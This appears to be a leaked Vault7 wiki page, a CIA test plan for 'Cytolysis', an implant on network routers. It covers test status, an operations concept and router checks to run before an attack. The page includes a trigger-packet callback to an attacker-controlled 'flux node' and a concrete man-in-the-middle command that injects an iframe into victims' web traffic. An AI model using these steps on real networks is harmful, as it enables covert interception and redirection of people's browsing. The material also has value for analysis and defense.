Vault7: CIA Hacking Tools Revealed
Navigation: » Latest version
Owner: User #71467
Cytolysis
Test Plan for Cytolysis-1h
- HG Base - complete
- Install - complete - Test 1
- Uninstall - complete - Test 1
- Restart Modules - complete - Test 2
- CT Session - complete - Test 1
- ACE - complete - Test 4
- SMITE
- DIVRT
- Packet Collection
- Redirection
- Performance Testing - Characterize CPU impact of capabilties - underway
- Sup Failover Testing
- Ad-Hoc Testing
- line cards being taken out/added/reloaded - complete - Test 5
- re-attack - complete - Test 3
- Perform system admin commands - complete - Test 12
- Add latency - complete - Test 13
- Run Stack Scrambler - Complete - multiple
- wireshark of comms traffic - complete - test 19
- reload device during HG install - complete Test 17
- perform system admin during HG upload - complete Test 18
- SP and linecard CPU - complete test 22
- input queue buffer checks
- test RAA assists dropped when HG uninstalled - complete Test 23
- test RAA dropped when packet assist threshold exceeded - complete Test 23
- verify if assist for flux 4 ip is present during CTCounter Terrorism session
- Verify that impersonated host can still get to flx 4 ip and other places
- verify assist is dropped once max number of matches occur on smite rule, or time duration expires
- Verify CPU impact and impact to other hosts who are browsing to a SMITE rule destination, but do not match smite rule
- On-Device OpSec - complete - Test 11
- CONOP Testing
CONOP
Designate a host to impersonate when making CTCounter Terrorism session
Verify the IOSApple operating system for small devices version and status of the device - can we do this?
IAC attack through flux nodes, coming out from mgmt network to vlan 1 IP
Upload HG and allow to run for some time to see traffic
Send a trigger packet from flx mgmt host to vlan 1 IP on UDP/161 asking for a callback to webserver flux node using designated impersonated host
ACE Commands to run before Packet Collection or SMITE
- show users all- verify no one else logged on
- show module - verify state of module 2, verify RP in slot 5 is active, slot 6 is hot
- show redundancy switchover - verify last switchover time and reason
- show ver - verify uptime and software version of device - can this be done before IAC/HG? if so, should be done then
- show run - verify that the configuration hasn't changed - VLANVirtual Local Area Network interfaces still configured with nat and unicast rpf, logging levels are same, acls, verify last time config was saved
- show proc cpu hist - verify CPU utilization of RP
- show history all - verify what commands have been run lately
- show log - verify any log messages, error conditions
- show arp - verify hosts in arp table
- show ip nat stat - verify how many NATNetwork Address Translation translations are active
- show ip nat trans - collect information on NATNetwork Address Translation flows - identify DNSDomain Name System servers in use for VLANVirtual Local Area Network 19, identify unique active hosts, identify destination web pages on port 80
- show ip route - verify OSPFOpen Shortest Path First routes
- show int vlan 2 - how much traffic currently to/from uplinks
- show int vlan 19 - how much traffic currently to/from customer of interest
Before attack, check packet assist threshold value - packet get_assist_threshold_status. Note that if packet assist threshold is reached, assists for SMITE will be dropped silently.
Choose a client(s)/server to iframe inject and create a rule that will add the iframe for a limited amount of time, and a limited total number of times per host if executing against a range of clients and overall limit. These flags should be:
mitm create http_iframe 10.11.0.10 255.255.255.255 0 0 X.X.X.XX (LVLT-GOGL-8-8-8[US]) 255.255.255.255 80 80 http://X.X.X.XX (LVLT-GOGL-8-8-8[US]):8888/?promo_code=1Z45RDJ" -ac 2 -sm 2 -t 60s -en -bc -bk
At this point, all traffic to X.X.X.XX (LVLT-GOGL-8-8-8[US]) is being promoted - run packet get_assist_threshold_status to verify maximum pps sent. Rule will be disabled after 60 seconds. Ideally, could identify a host you want to smite and a destination that only that host tends to go to on port 80.